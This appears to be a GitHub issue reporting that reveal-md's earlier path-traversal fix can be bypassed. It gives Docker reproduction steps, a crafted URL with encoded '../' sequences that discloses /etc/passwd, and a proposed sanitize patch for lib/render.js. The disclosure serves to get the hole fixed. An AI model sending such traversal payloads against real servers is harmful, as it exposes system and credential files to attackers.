
Patch for issue#409 is not sufficient and the protection can be bypassed by an attacker

Open W0rty opened this issue 3 years ago • 1 comment

Steps to reproduce:

  • git clone https://github.com/webpro/reveal-md
  • cd reveal-md && sudo docker build -t revealmd .
  • sudo docker run --rm -p 1948:1948 -p 35729:35729 -v $PWD/demo/:/slides webpronl/reveal-md:latest /slides --watch

Then open your browser and reach the following URL: http://localhost:1948/a.md/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd#/

The content of the file /etc/passwd is disclosed.

I have a patch for it in the file lib/render.js:

const path = require('path');
// getInitialDir() and renderFile() are provided elsewhere in reveal-md's lib/render.js (not shown in this excerpt).

// Strip every ".." from the request path, repeating until none remain.
function sanitize(entry) {
  if (entry.includes('..')) {
    entry = sanitize(entry.replace('..', ''));
  }
  return entry;
}

module.exports = async (req, res) => {
  const dir = await getInitialDir();
  console.log(sanitize(decodeURIComponent(req.url))); // debug output of the sanitized path
  const filePath = path.join(dir, sanitize(decodeURIComponent(req.url)).replace(/\?.*/, ''));
  const markup = await renderFile(filePath);
  res.send(markup);
};

W0rty avatar Jul 13 '22 09:07 W0rty

Thanks @W0rty, please open a PR if you have a patch

webpro avatar Jul 13 '22 09:07 webpro